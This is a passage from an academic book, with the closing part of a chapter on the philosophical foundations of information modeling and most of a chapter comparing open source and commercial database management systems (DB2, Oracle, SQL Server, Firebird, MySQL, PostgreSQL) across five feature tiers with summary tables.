they are a part of the real world, how do we know when we have found them? If they are constructed, how do we know if we have constructed them correctly? The philosophical problem encountered when organizing the particulars of our experience into categories is called the problem of universals. It is exactly the same problem that database designers encounter when they attempt to construct an entity model of an application domain. Earlier work (Artz, 1999) shows that the philosophical assumptions revealed in some widely used texts
Philosophical Foundations of Information Modeling
on information modeling are seriously conflicted, leading to a muddle of confusion with regard to the process of information modeling. A better understanding of the problem of universals from Plato to the present could provide some insight into this problem and possible a resolution. Philosophical problems aside, when we create an entity type, we implicitly assume that the members of the entity type are all of the same kind. However, what do we mean by the same? If we look at the category called Students, we find that some are male and some are female. Some are young and others are older. Some are very bright. Others are less bright. How can people with so many differences be considered the same? The easy answer is that they are all the same because they are all students—but that begs the question. Ultimately, we group things because of a similarity of essence, and the concept of identity gives us insight into the notion of the similarity of essence. Any given group of people may share multiple similarities of essence. Given any group of people associated with a university, for example, we could divide them into Students and Professors, Younger People and Older People, Part-Time People and Full-Time People, people who are interested in technology and people who are interested in history, and so on. How do we know which characteristic is the most essential in forming the groupings? The answer is that it depends on what you are trying to represent with the model that you are constructing. More specifically, you need clearly articulated modeling objectives that will help guide you in determining the most essential characteristics. This in turn implies that you need to understand the purpose for which an information model is being constructed in order to construct it properly. From a philosophical perspective, we call this a teleological approach because it is driven by the final cause (as Aristotle would call it) or the purpose of the database. Finally, when we consider the various purposes for which we may construct a database, the pri-
mary purpose is always to provide information that will extend our knowledge about an application domain. A more subtle purpose is our intent with regard to refining the knowledge of that application domain. This is where the theories of truth come into play. If we adopt the naïve adaptation approach, we will attempt to model the semantics of the domain as they currently exist. This will make the database easier for users to accept, but the exploitability of the database will be limited. We tend not to use ordinary language to gain deeper insights into things. Francis Bacon (2000) called this phenomenon “idols of the marketplace.” In his landmark work on the philosophy of science “The New Organon,” Bacon says: Men associate through talk; and the words are chosen to suit the understanding of the common people. And thus a poor and unskillful code of words incredibly obstructs the understanding. …Plainly, words do violence to the understanding, and confuse everything; and betray men into countless empty disputes and fictions. (p. 42) Doubtless, Bacon would not accept the naïve adaptation view of database design. In search of greater exploitability, we may look more deeply into the semantics of the application domain, beyond the superficial conversational level of most users. We may look to categories of things of interest despite the different names that might be used by different people for those categories. In this case, we adopt the correspondence view of truth. That is, the entity classes in the database must correspond to foundation categories or concepts in the application domain. Those foundation categories may be quite different from the categories that people are used to talking about. It may also turn out that the application domain does not have foundation categories. That is, when you examine the usage of terms, you may find out that the common usages of the words in the application domain are too ambiguous to allow
9
Philosophical Foundations of Information Modeling
effective database design. In this case, you may have to clean up the semantics in order to make the domain coherent and amenable to improvement through the development of a database.
IMPLICATIONS The implications for the practice of information modeling are rather profound, but not nearly as profound as the implications for research in information modeling. Currently, the practice of information modeling begins as a naïve linguistic exercise in which the information modeler explores the application domain and attempts to come up with entity classes based on discussions with users and stakeholders within the application domain, reviews of existing systems, and perusal of various documents. Once the model is constructed, a user or stakeholder may quibble over how a particular entity class has been defined, but it is very unlikely that anyone will raise the question of whether or not it is the correct entity class. The design and development process continues until an information system is produced. This system is either accepted by the users, rejected by the users, or accepted conditionally pending future maintenance. However, there is nothing in the process currently to address the question of whether the correct information model was constructed. The teleological nature of information models expressed in this article suggests that in any given application domain, many information models are possible to serve many different purposes. Thus, the purpose for which an information model is being constructed must be clearly defined. In practical terms, this means that modeling objectives must be articulated. A model must be constructed to meet those articulated objectives, and the model may be validated based on the extent to which it meets those objectives. Research in information modeling is likely to change to accommodate these changes in prac-
10
tice. Currently, research in information modeling focuses on representation, documentation, and application generation. But, if the initial model is not correct, then how that model is represented and documented is of less importance. Any applications generated from an incorrect model cannot be correct. Instead, research needs to focus on how modeling objectives are derived and how models can be constructed to meet objectives. In addition, we need to better understand the process of validating models with respect to objectives. Even if modeling objectives are clearly articulated, there are still a host of philosophical, psychological, and sociological issues to contend with. This article has introduced some of the philosophical issues, but the treatments here have been necessarily superficial at best. So research in information modeling would turn away from the problem of representation and documentation and toward the problems of construction and validation.
LIMITATIONS This study addresses the foundations of information modeling from a rational metaphysical perspective. It addresses philosophical issues pertaining to the economical representation of information for the purpose of exploitation. This is not the only philosophical perspective. An empirical approach might focus on a more faithful representation of reality with less concern for the utility of the representation for purposes of exploitation. We see more empirically oriented approaches in machine learning and computational induction. It would be interesting to compare the benefits and drawbacks of these two approaches, but that is way beyond the scope of this article. There are also social and psychological foundation issues. How does a social group come up with the set of categories that it uses in either its natural language or in a formal language used to represent general concepts? How does that process affect
Philosophical Foundations of Information Modeling
the intellectual exploitability of those concepts? Finally, there are numerous psychological issues that affect the construction of categories. These range from the psychology of concept to formation to much more heuristic techniques in critical reasoning. All of these areas not addressed are valuable, interesting, and may well contribute further to our understanding of information modeling. However, research must have its boundaries, and these other areas of investigation are well beyond the scope of this article.
CONCLUSION AND CAVEATS One of the many purposes of philosophy is to integrate what we already know or understand with new knowledge that we discover. The past few decades have seen a dramatic increase in the amount of knowledge that we have discovered in information systems. However, it is difficult to know what to do with this knowledge as long as it is not integrated with other things that we know. The purpose of this article was to integrate some very fundamental concepts in metaphysics with the process of information modeling and thus provide the beginnings of a philosophical foundation for information modeling. It is important to remember that the ideas in this article are ideas from philosophy applied to information systems, not ideas from information systems reflected upon philosophically. Hence, readers who are deeply immersed in information systems with little exposure to philosophy might find some of the ideas strange or inconsistent with their current views of information systems. Those readers should reflect on the ideas in the article before rejecting them because they are different.
REFERENCES Artz, J. (1997). A crash course in metaphysics for the database designer. Journal of Database Management, 8(4).
Artz, J. (1998). Information modeling and the problem of universals: A preliminary analysis of metaphysical assumptions. Proceedings of the Association for Information Systems 1998 Americas Conference. Artz, J. (1999). An analysis of ontological assumptions in information modeling. In M. KhosrowPour (Ed.), Managing information technology resources in organizations in the next millennium. Idea Group Publishing. Artz, J. (2001). A teleological approach to information systems development. In M. Khosrow-Pour (Ed.), Managing information technology in a global economy. Idea Group Publishing. Artz, J. (2006). Conflicting ontological assumptions in information modeling. In Encyclopedia of database technologies and applications. Information Science Publishing. Bacon, F. (2000). The new organon. In L. Jardine & M. Silverthorne (Eds.), Cambridge texts in the history of philosophy. Cambridge University Press. Benbasat, I., & Zmud, R. (2003). The identity crisis within the IS discipline: Defining and communicating the discipline’s core properties. MIS Quarterly, 27(2), 183-194. Burrell, G., & Morgan, G. (1979). Sociological paradigms and organizational analysis. London: Heinemann. Carr, N. (2003). IT doesn’t matter. HBR at Large, pp. 41-49. Checkland, P. B. (1989). Soft systems methodology. Human Systems Management, 8(4), 271-289. Codd, E. F. (1970). A relational model of data for large shared data banks. Communications of the ACM, 377-387. Culnan, M. (1986). The intellectual development of management information systems, 1972-1982:
11
Philosophical Foundations of Information Modeling
A co-citation analysis. Management Science, 32(2), 156-172. Farhoomand, A., & Drury, D. (2001). Diversity and scientific progress in the information systems discipline. Communications of the AIS, 5(12). Gottlieb, A. (2002). The dream of reason. W. W. Norton & Company. Gray, P. (2003). Editorial: Introduction to the debate on the core of the information systems field. Communications of AIS, 12(42). Hirsch, E. (1982). The concept of identity. Oxford University Press. Hirsch, E. (1993). Dividing reality. Oxford University Press. Hirschheim, R., Klein, H., & Lyytinen, K. (1995). Information systems development and data modeling: Conceptual and philosophical foundations. Cambridge University Press.
Prior, A. N. (1967). Correspondence theory of truth. In P. Edwards (Ed.), Encyclopedia of philosophy (Vol. 1, pp. 223-232.). New York: Macmillan Publishing. Robey, D. (2003). Identity, legitimacy and the dominant research paradigm: An alternative prescription for the IS discipline. Journal of the Association for Information Systems, 4(7), 352-359. Roochnik, D. (2002). An introduction to Greek philosophy. The Teaching Company. Schoedinger, A. (Ed.). (1992). The problem of universals. Humanities Press. Stroll, A. (1967). Identity. In P. Edwards (Ed.), Encyclopedia of philosophy (Vol. 4, pp. 121-124). New York: Macmillan Publishing. Weber, R. (1987). Toward a theory of artifacts: A paradigmatic base for information systems research. Journal of Information Systems, 3-19.
Keen, P. (1980). MIS research: Reference disciplines and a cumulative tradition. Proceedings of the 1st International Conference on Information Systems, 9-18.
Weber, R. (2003). Still desperately seeking for the IT artifact (editor’s comments). MIS Quarterly, 27(2), iii-xi.
Kent, W. (1978). Data and reality: Basic assumptions in data processing reconsidered. North-Holland.
White, A. R. (1967). Coherence theory of truth. In P. Edwards (Ed.), Encyclopedia of philosophy (Vol. 1, pp. 130-133). New York: Macmillan Publishing.
Losee, J. (1993). A historical introduction to the philosophy of science. Oxford University Press. Orlikowski, W., & Iacono, C. (2001). Research commentary: Desperately seeking the “IT” in IT research: A call to theorizing the IT artifact. Information Systems Research, 12(2), 121-134.
Woozley, A. D. (1967). Universals. In P. Edwards (Ed.), Encyclopedia of philosophy (Vol. 7, pp. 194206). New York: Macmillan Publishing.
This work was previously published in International Journal of Intelligent Information Technologies, Vol. 3, Issue 3, edited by V. Sugumaran, pp. 59-74, copyright 2007 by IGI Publishing, formerly known as Idea Group Publishing (an imprint of IGI Global).
12
13
Chapter 1.2
A Generalized Comparison of Open Source and Commercial Database Management Systems Theodoros Evdoridis University of the Aegean, Greece Theodoros Tzouramanis University of the Aegean, Greece
ABSTRACT This chapter attempts to bring to light the field of one of the less popular branches of the open source software family, which is the open source database management systems branch. In view of the objective, the background of these systems will first be briefly described followed by presentation of a fair generic database model. Subsequently and in order to present these systems under all their possible features, the main system representatives of both open source and commercial origins will be compared in relation to this model, and evaluated appropriately. By adopting such an approach, the chapter’s initial concern is to ensure that the nature of database management systems in general can be apprehended. The overall orientation leads to an understanding that the gap between open and closed source database management systems has
been significantly narrowed, thus demystifying the respective commercial products.
INTRODUCTION The issue of data storage, organization, protection, and distribution has grown in importance over the years. This is justified by the fact that data, in increasing quantities and of multiple origins, serving possibly different operational divisions, were required to be processed by companies and organizations in order to be viable and, if that was achieved, to flourish appropriately (Loney & Bryla, 2005). This chapter will initially examine the field of database software, while pinpointing and briefly examining the most important representatives of both open source and commercial origins. Subsequently, a generalized structure of the database
A Generalized Comparison of Open Source and Commercial Database Management Systems
model will be deployed and the most significant database system software will be evaluated according to the model’s component specifications. The chapter will conclude by presenting the results of the comparison along with our views on the future of open source database software.
BACKGROUND The open source vs. closed source (alternatively called proprietary development) debate has been a topic of continuous quarrel between experts affiliated to either of the two camps. The notion of making money through traditional methods, such as the selling of individual copies is incompatible with the open source philosophy. Some proprietary source advocates perceive open source software as damaging to the market of commercial software. However, this complaint is countered by a large number of alternative funding streams such as (Wikipedia. org, 2006a): •
•
•
Giving away the software for free and, in return, charging for installation and support as in many Linux distributions Making the software available as open source so that people will be more likely to purchase a related product or service you do sell (e.g., OpenOffice.org vs StarOffice) Cost avoidance/cost sharing: Many developers need a product, so it makes sense to share development costs (this is the genesis of the X-Window System and the Apache Web server).
Moreover, advocates of closed source argue that since no one is responsible for open source software, there is no incentive and no guarantee that a software product will be developed or that a bug in such a product will be fixed. At the same time, and in all circumstances, there is no specific
14
entity either of individual or organizational status to take responsibility for such negligence. However, studies about security in open source software vs. closed source software (Winslow, 2004) claim that not only each significant commercial product has its counterpart in the open source arsenal but also that open source software usually provides less time for flaw discovery and, consequently, for a relative patch or fix. Besides, open source advocates argue that since the source code of closed source software is not available, there is no way to know what security vulnerabilities or bugs may exist. The database system software twig of the open source software family has been highly criticized especially during the last 10 years. This is due to the fact that the early versions of such products included relatively few standard relational database management system (RDBMS) features. This has led some database experts, such as Chris Date (Wikipedia.org, 2006b), a database technology specialist, who was involved in the technical planning of DB2, to criticize one of the major representatives of the field, MySQL, as falling short of being a RDBMS. Open source RDBMSs advocates reply (BusinessWeek.com, 2006) that their products serve their purposes for the users, who are willing to accept some limitations (which are fewer with every major revision) in exchange for speed, simplicity, and rapid development. Developers and end-users alike have been using more and more open source database management systems (DBMSs). Such experimentation has laid the groundwork for open source DBMSs to follow in the footsteps of Apache and Linux, two open source code products that have already penetrated the enterprise wall. Nonetheless, analysts Scott Lundstrom, Laura Carrillo and David O’Brien are of the opinion that open source DBMSs are not going to get the boost from IBM and Oracle that Linux and Apache did (Informationweek.com, 2004) due to the apparent competitive adversity of the former with the database commercial products published by these two companies.
A Generalized Comparison of Open Source and Commercial Database Management Systems
Another group of experts (Wikipedia.org, 2006b) claims that another, perhaps simpler, explanation for open source DBMSs popularity is that it they are often included as a default component in low-end commercial Web hosting plans along side with PHP or Perl.
MAIN THRUST OF THE CHAPTER The Competitors
intelligence features such as data mining, OLAP, and in line-analysis. On January 30, 2006, (IBM.com, 2006) IBM released a “community” edition of DB2 called DB2 Universal Database Express-C. This was an expected response to the recently announced free versions of Oracle 10g and Microsoft SQL Server. Express-C has no limit on number of users or database size. It’s deployable on machines with up to two processors and up to 4GB of memory. DB2 can be administered from either the command-line or a graphical user interface (GUI).
DB2 Oracle DB2 is IBM’s family of information management software products. Most often, though, when people say DB2, they are referring to IBM’s flagship RDBMS, DB2 Universal Database (DB2 UDB). The software is available on many hardware and operating system platforms, ranging from mainframes and servers to workstations and even small hand-held devices. It runs on a variety of IBM and non-IBM operating systems. Besides the core database engine, the DB2 family consists of several other products that provide supplementary support to the DBMS’s functionality such as administration and replication tools, distributed data access, online analytical processing (OLAP) and many others. The origin of DB2 can be traced back to the System R project at the IBM’s Almaden Research Centre. The first official release took place in 1984 and was designed to operate on IBM’s mainframe platform (Silberschatz, Korth, & Sundarsham, 2002). DB2 is available in several editions, in other words, licensing arrangements. By opting for a reduced-feature edition, IBM allows customers to avoid paying for DBMS features which they do not need. Sample editions include the Workgroup, Workgroup Unlimited, and Enterprise Server Edition. A high-end edition is called DB2 UDB Data Warehouse Enterprise Edition, or DWE for short. This edition includes several business
Oracle Corporation founded in 1977 produces and markets the Oracle RDBMS, which many database applications use extensively on many popular computing platforms. Larry Ellison, Bob Miner, and Ed Oates—of Software Developer Laboratories (SDL)—developed the original Oracle DBMS software. They called their product Oracle after the code name of a CIA-funded project they had worked on while previously employed by Ampex Company. Their product was the first to reach the market, and, since then, has held a leading position in the relational database market (Silberschatz, Korth, & Sundarsham, 2002). In 2003, the Oracle Corporation released Oracle Database 10g. The g stands for grid, emphasizing a marketing thrust of presenting 10g as “grid computer ready.” As of June 2005, the Oracle Corporation has been supporting a wide array of operating systems including Windows and the majority of Unix-based operating systems. The Database distribution includes many built-in tools, including a Java-based utility (Figure 1) and a Web-based tool serving the same purpose. In addition, the company sells a set of added value add-on products (Loney & Bryla 2005)
15
A Generalized Comparison of Open Source and Commercial Database Management Systems
Figure 1. The Oracle Java-based administration console
tially. As computers running Oracle often have eight or more processors, the software price can be in the hundreds of thousands of dollars. The total cost of ownership is much more, as Oracle databases usually require highly trained administrators to operate.
SQL Server
that expand the DBMS capabilities, providing specialized tools such as query and analysis tools, data mining and sophisticated security tools, and so forth. The development of applications utilizing the Oracle RDBMS commonly takes place in Java, which is inherently supported by the database. Oracle Corporation has started a drive toward wizard-driven environments with a view to enabling non-programmers to produce simple data-driven applications. Oracle, as of January 2006, offers Database 10g Express Edition (Oracle Database XE) an entry-level, small-footprint databasebased on the Oracle Database 10g Release 2 code base that is free to develop, deploy, and distribute; and is fast to download; and simple to administer. Furthermore, Oracle’s flagship the Enterprise edition is also a free download, but its use is, as with express edition, restricted to development and prototyping purposes. Commercial usage must be accompanied with an appropriate license from the Corporation. However, Oracle database software is considered to be one of the most expensive. As of January 2006, the list price for the Enterprise Edition is $40,000 per processor. Additional features and maintenance costs may add to the price substan-
16
Microsoft SQL Server is a RDBMS produced by Microsoft. It is commonly used by businesses for small- to medium-sized databases, and—in the past five years—some large enterprise databases. The code base for Microsoft SQL Server (prior to version 7.0) originated in Sybase SQL Server, and was Microsoft’s entry to the enterprise-level database market, competing against Oracle and IBM. About the time Windows NT operating system was coming out, Sybase and Microsoft parted ways and pursued their own design and marketing schemes. Several revisions have been done independently since, with improvements for the SQL Server. The SQL Server 7.0 was the first true GUI-based DBMS server (Spenik &d Sledge 2002). The Microsoft SQL Server product is not just a DBMS, it also contains (as part of the product) an enterprise ETL tool (Integration Services), Reporting Server, OLAP and messaging technologies specifically Service Broker. Microsoft released the SQL Server Express product (Microsoft.com 2006), which included all the core functionality of the SQL Server, but places restrictions on the scale of databases. It will only utilize a single CPU, 1 GB of RAM, and imposes a maximum size of 4 GB per database. SQL Express also does not include enterprise features such as Analysis Services, Data Transformation Services, and Notification Services. Microsoft’s primary competition includes Oracle and DB2. The SQL Server, as of January 2006, has been ranked third in revenue share among these big three DBMSs’ vendors. A sig-
A Generalized Comparison of Open Source and Commercial Database Management Systems
nificant drawback of the SQL Server is that it runs only on the Windows Operating System.
Firebird Firebird (sometimes called FirebirdSQL) is a RDBMS offering many ANSI SQL-99 and SQL-2003 features. It runs on Linux, Windows, and a variety of Unix platforms. Firebird was programmed and is maintained by Firebird Foundation (formerly known as FirebirdSQL Foundation). It was forked from the open sources of InterBase from Borland. Firebird’s first release took place back in 1984 and, as of January 2006, the product has evolved to being a very mature DBMS requiring minimal administration, providing advanced features, and compliant database engine that implements most of the SQL-2003 standard (The Inquirer. net, 2005, Firebirdsql.org, 2006a). Firebird is expandable, utilizing specialized modules that are licensed under the Initial Public Developers License (IDPL). The original modules released by Inprise are licensed under the Interbase Public License. Both licences are modified versions of the Mozilla Public License. In April 2003, Mozilla decided to rename their Web browser from Phoenix to Firebird. This decision caused concern within the Firebird DBMS project because of the assumption that a DBMS and Web browser using the Firebird name would confuse users. The dispute continued until the Mozilla developers, on February of 2004, renamed their product as Firefox thus clearing up confusion (Wikipedia, 2006b).
also dually license it under traditional proprietary licensing arrangements for cases where the intended use is incompatible with the GPL (MySQL.com, 2005). A license of this type might for example be suitable for companies that do not want to release the source code of their MySQLbased application. The company MySQL AB also develops and maintains the system, selling support and service contacts as well as proprietary licensed copies of MySQL, and employing people all over the world who collaborate via the Internet. Among its strong points are its speed, ease of installation, and as of January 2006 MySQL’s version 5 included for the first time many new enterprise level features. MySQL is also highly popular for Web applications and acts as the DBMS component of the LAMP platform (Linux/Apache-MySQL-PHP/ Perl/Python). Its popularity as a Web application is closely tied to the popularity of PHP, which is often combined with MySQL and nicknamed the Dynamic Duo. To administer MySQL one can use the included command-line tool and free downloadable separate GUI administration tools. One of them, MysqlAdministrator, is depicted in Figure 2. MySQL works on many different platforms, including Windows, Linux, and UNIX based opFigure 2. The MySQL Administration Console
MySQL MySQL is considered the most popular open source RDBMS with an estimated six million installations (BusinessWeek.com, 2006). Its first release took place unofficially in 1995. Swedish company MySQL AB is responsible for MySQL making their product available as free software under the GPL License. At the same time they
17
A Generalized Comparison of Open Source and Commercial Database Management Systems
erating systems. MySQL features have attracted a set of distinguished customers including Yahoo!, CNET networks, Amazon, Cox Communications, and others. These firms have adopted MySQL as a reliable solution to support some of their internal operations.
PostgreSQL supports a number of add-on modules and packages such as geographic objects, full text search, replication packages and XML/XSLT support that greatly enhance the products’ capabilities (PostgreSQL.com, 2005a). Moreover, PostgreSQL has provided the base for the development of EnterpriseDB (EDB). The latter is a most promising enterprise-class RDBMS compatible with Oracle—and costing as a base product only a minor fraction, varying from 10% to 20%, of the price of a commercial system. On the down side, the product suffers from an image problem (The Inquirer.net 2005).This is on account of the fact that PostgreSQL remains a project and there is no company accountable for offering respective services and support. Moreover, even though it is regarded by many as the most advanced open source DBMS, and despite commercial support by many smaller companies, it has a relatively small base of installations.
PostgreSQL PostgreSQL is a free object-relational database management system (ORDBMS) released under flexible BSD License. It offers an alternative to other open source database systems as well as to commercial systems. Similar to other open source projects such as Apache and Linux, PostgreSQL is not controlled by any single company, but relies on a community of global developers and companies to develop it. PostgreSQL is based on POSTGRES Version 4.2 1, developed at the University of California in the Berkeley Computer Science Department. POSTGRES pioneered many concepts, such as functions, inheritance, and other object-oriented features that only became available in some commercial database systems much later. PostgreSQL is an open source descendant of this original Berkeley code. It supports a large part of the SQL standard and offers many advanced features. Furthermore
A Fair DBMS Model As seen above, all the competitors have been on track for years and this justifies the popularity and recognition that these DBMSs enjoy. Some useful information regarding these systems is summarized in Table 1.
Table 1. Generic Information regarding DBMSs RDBMS
A Generalized Comparison of Open Source and Commercial Database Management Systems
Over the years, vendors kept improving their software by adding new features and increasing performance and stability (Fermi National Accelerator Laboratory, 2005). Unfortunately, this furthermore obscures the situation, as no database software can prove to be better than the others. Taking into account marketing and software promotion, the situation becomes even more complicated as vendors attempt to prove the dominance of a product. In an attempt to resolve the issue, a five-component DBMS comparison model was conceived and used as a protractor in order to produce fair, accurate and valuable results, setting open source against commercial in the scientific field of database software. The model’s architecture was influenced by all time classic DBMS standards (Johnson, 1997) as well as by the requirements (BusinessWeek.com, 2006) of low to high-populated organizations from database software. The first component includes the fundamental features that modern database system software should provide. Among these are elementary data type support, SQL standard compliance data constraint, index, and transaction protocols support. The second component is made up of advanced DBMS features such as special data types, stored procedures, triggers, cursors, sequences, user-defined data types, OLAP and inherent support for object oriented, spatial, and XML databases. The third component is related to database administration robustness and optimization. Evaluation on this component is based on provision of the appropriate access control, backup, and data migration mechanisms as well as replication support and recovery capabilities of the software products. The fourth component consists of customizability criteria like scalability, reliability, and database performance according to data set size. The fifth component features DBMS support and acceptance. Software training, operation, administration and maintenance manuals, as well
as programming interfaces, external libraries and product popularity around the world are considered to belong to this evaluation component. Following are comparisons and evaluations, mapping every DBMS model’s components to respective tiers. The results of this appraisal are presented in the final part of the section.
The Comparison Tier 1 All DBMSs perform, with respect to these particular component standards, within very high levels (Devx.com, 2005). They fully support the latest, as of January 2006, SQL—2003 Standard, and their transactions comply with the ACID protocol. MySQL could be taken as an exception, as both transactions and, as a result, ACID, along with referential integrity constraints, are supported on Tables utilizing the INODB storage engine and not on the other available ones like MYISAM (PostgreSQL.org, 2005b). Additionally, MySQL, PostgreSQL and Firebird support the 2-phase commit protocol to achieve concurrency control while commercial systems offer more options. Furthermore, commercial DBMSs alongside with PostgreSQL and MySQL support save points during transactions. Finally, with respect to indexes Oracle is known for the amount of tweaking it allows for databases, especially when it comes to indexing. Other systems support single column, multi-column, unique, full text and primary key indexes. The results from the comparison at the first tier are summarized in Table 2.
Tier 2 All commercial systems support advanced data types like large objects, which have become increasingly popular over the years. Proprietary DBMSs and PostgreSQL have network-aware data types that recognize Ipv4 and Ipv6 data types.
19
A Generalized Comparison of Open Source and Commercial Database Management Systems
Moreover, MySQL and PostgreSQL also both support the storing of geographic features, data types and operations of the Open Geodata Interchange Standard (OpenGIS). All systems support enterprise level features such as triggers, views, stored procedures, cursors while PostgreSQL and Commercial systems additionally support inheritance, sequences, and user-defined data types as well as. Additionally all systems use a procedural extension to the SQL query language to allow developers to implement routines that transfer some application logic to the database. Examples of using these routines are stored procedures that are written in a respective database procedural language. Among them, Oracle Database’s choice, named PL/SQL although considered most difficult to use, is also thought of as the most powerful one. Firebird Database, using the Compiere module (Firebirdsql.org, 2006b) is capable of executing
natively Oracle PL/SQL code, while MySQL and PostgreSQL use their own versions of procedural language in their DBMSs. On the other hand, MySQL alone in the open source camp supports the advanced feature of data partitioning within a DBMS. All open source DBMSs, save PostgreSQL, fall short when it comes to XML support. This consistutes an issue that will certainly be addressed in future releases of these systems. Finally, all open source systems lack OLAP support to perform high demanding large enterprise business intelligence operations. On the commercial base, IBM, Microsoft and Oracle supply their products with in-house OLAP modules that expand the capabilities of their software to serve organizations that require such services. The results from the comparison at this tier are summarized in Table 3.
Table 2. Tier 1 comparison results RDBMS
SQL Standard Compliance
ACID Compliance
Constraint Support
Transaction and Lock Support
Indexes
DB2
VERY HIGH
YES
YES
VERY HIGH
VERY HIGH
Firebird
VERY HIGH
YES
YES
HIGH
HIGH
MySQL
VERY HIGH
YES/NO
YES/NO
HIGH
HIGH
Oracle
VERY HIGH
YES
YES
VERY HIGH
VERY HIGH
PostgreSQL
VERY HIGH
YES
YES
HIGH
HIGH
SQL Server
VERY HIGH
YES
YES
VERY HIGH
VERY HIGH
Table 3. Tier 2 comparison results
20
RDBMS
Advanced Data types
Advanced Features
OpenGIS Support
XML Support
OLAP Support
Object-Oriented Features
DB2
VERY HIGH
VERY HIGH
YES
YES
YES
YES
Firebird
HIGH
HIGH
NO
NO
NO
NO
MySQL
HIGH
VERY HIGH
YES
NO
NO
NO
Oracle
VERY HIGH
VERY HIGH
YES
YES
YES
YES
PostgreSQL
VERY HIGH
VERY HIGH
YES
YES
NO
YES
SQL Server
VERY HIGH
VERY HIGH
NO
YES
YES
YES
A Generalized Comparison of Open Source and Commercial Database Management Systems
Tier 3 This specific tier shows some of the features that should be addressed at the open source DBMSs in order for it to become more competitive. With respect to security, open source DBMSs support access control mechanisms data encryption, views, roles and other security methods that can undoubtedly constitute a reliable backbone for any organization. On the other hand they lack the sophisticated security mechanisms offered by commercial products such as Oracle’s added value add on “Oracle Advanced security” (Oracle.com, 2006) which offers more options and supports some industry standard authentication methods such as PKI. The SQL Server, on the other hand, even though it often uses Windows authentication and is subject to OS-based vulnerabilities that can compromise its operation, has received a C2 certificate from the U.S. government’s National Security Agency that recommend it for use in government projects. When it comes to backup, open source DBMSs come with appropriate scripts to facilitate a simple text dump of database data and its schema like Firebird’s NBackup module. At the same time all products provide methods for doing a hot-database backup or, in other words, backing up the database without shutting it down. However, they still lack the array of options during a backup procedure that commercial systems offer, allowing the generation of automatic selective and customisable backups. On the contrary, open source DBMSs prove to offer high data migration capabilities, allowing data hosted in their system to be formatted appropriately for usage in another database. Commercial systems support data migration, often via commercial third party tools. Another major feature of enterprise-level DBMSs is support for replication. Both MySQL and PostgreSQL have support (Devx.com, 2005) for single-master, multi-slave replication scenarios. Commercial systems offer more replication methods, although these methods are not considered of outmost necessity for
the majority of users and organizations. Finally, with respect to recovery in MySQL, only InnoDB tables have automatic crash recovery of a running database in background, without setting any locks or using replication methods. PostgreSQL uses a system called Write Ahead Logging to provide database consistency checking and point-in-time recovery (PiTR) that allows recovery either to the point of failure or to some other in the past (PostgreSQL.com, 2005a). Firebird uses third party tools (FreeDownloadsCenter, 2006) that can be used for automatically diagnosing and repairing corrupted data due to failures during normal operation. Commercial DBMSs provide automated and manual recovery capabilities that allow the database to return to any chosen state, according to specific log files, like the REDO LOGS in Oracle Database. The results from the comparison at tier 3 are summarized in Table 4.
Tier 4 The fourth component consists of quality criteria such as scalability, reliability, and database performance. DB2, Oracle and SQL Server can scale to terabytes of data storage fairly easily supporting millions of users. This is achieved (Microsoft. com, 2006) by supporting scale up on symmetric multiprocessor (SMP) systems, allowing users to add processors, memory, disks and networking to build a large single node, as well as scale out on multinode clusters. Thus, it makes possible for a huge database to be partitioned into a cluster of servers, each server storing part of the whole database, and each doing a portion of the work, while the database remains accessible as a single entity. Various sources (IBM.com, 2006), (Oracle.com, 2006) give an edge on one commercial system over the other, but these systems are considered by many to belong to the same high quality class (Wikipedia.org, 2006b). MySQL using the MySQL Cluster option (MySQL.com, 2006) and PostgreSQL are known
21
A Generalized Comparison of Open Source and Commercial Database Management Systems
Table 4. Tier 3 comparison results RDBMS
Security Features
Backup
Data Migration
Replication
Recovery
DB2
VERY HIGH
VERY HIGH
HIGH
VERY HIGH
VERY HIGH
Firebird
HIGH
HIGH
HIGH
MEDIUM
HIGH
MySQL
HIGH
HIGH
VERY HIGH
HIGH
HIGH
Oracle
VERY HIGH
VERY HIGH
HIGH
VERY HIGH
VERY HIGH
PostgreSQL
HIGH
HIGH
VERY HIGH
HIGH
VERY HIGH
SQL Server
VERY HIGH
VERY HIGH
HIGH
VERY HIGH
VERY HIGH
to run very fast, managing up to more than 500 transactions per second when dealing with databases hosting gigabytes of data and can perform adequately enough even when the size of the databases exceeds that threshold. Firebird, as of January 2006, offers some baseline multiprocessor support although it uses a standard process-based architecture. This decreases significantly its performance when the hosted data become of terabyte magnitude. With respect to reliability, MySQL, because of a large installed base and as a result of the knowledge and experience surrounding it, is perceived to be a highly reliable system. Looking in the same direction, PostgreSQL, although less popular, has proved to be a very dependable system, a fact that can be credited to the rich set of features and the maturity of this software product (BusinessWeek. com, 2006). Firebird on the other hand, although with smallest installed base, has demonstrated a remarkable stability and consistency. Commercial systems then again, are accompanied by industry standard verification certificates that ensure the product’s reliability and quality of service. An example of this is the Common Criteria Certification awarded to SQL Server 2005 (Microsoft.com, 2006). The TPC (Transaction Processing Council) is an independent organization that specifies the typical transactions and some general rules these transactions should satisfy. The TPC produces benchmarks that measure transaction processing and database performance in terms of how many
22
transactions a given system and database can perform per unit of time, for example, transactions per second or transactions per minute.As of June 2006, Oracle is the fastest commercial DBMS around, outperforming DB2 and SQL Server (Transaction Processing Performance Council, 2006) and maintaining the place that it had the previous years (Eweek.com, 2002; Burlseon Consulting, 2003; Promoteware.com, 2004). Open source DBMSs did not participate in this comparison: according to the party who benchmarked (Promoteware.com, 2004) this was because of their limitations when dealing with large data sets. However, at the level of data sizes of small to medium enterprises, several gigabytes, it has been shown that the open source DBMSs perform equivalently to proprietary ones. Among open source DBMSs, MySQL is believed to be the fastest (Eweek.com, 2002). The results from the comparison at tier 4 are summarized in Table 5.
Tier 5 On the whole, commercial products enjoy high support from their respective owners varying from initial training to real-time diagnostic and monitoring capabilities that serve optimization ends. Additionally many third-party affiliate consultants can be easily located all around the world. The issue of support faces mitigated point of views for open source software in the enterprise. Many do not realize that support is available for many open source products—beyond Web sites
A Generalized Comparison of Open Source and Commercial Database Management Systems
Table 5. Tier 4 comparison results Reliability
RDBMS
Scalability
DB2
VERY HIGH
VERY HIGH
VERY HIGH
Firebird
HIGH
HIGH
HIGH
MySQL
VERY HIGH
VERY HIGH
VERY HIGH
Oracle
VERY HIGH
VERY HIGH
VERY HIGH
PostgreSQL
MEDIUM
VERY HIGH
HIGH
SQL Server
VERY HIGH
VERY HIGH
VERY HIGH
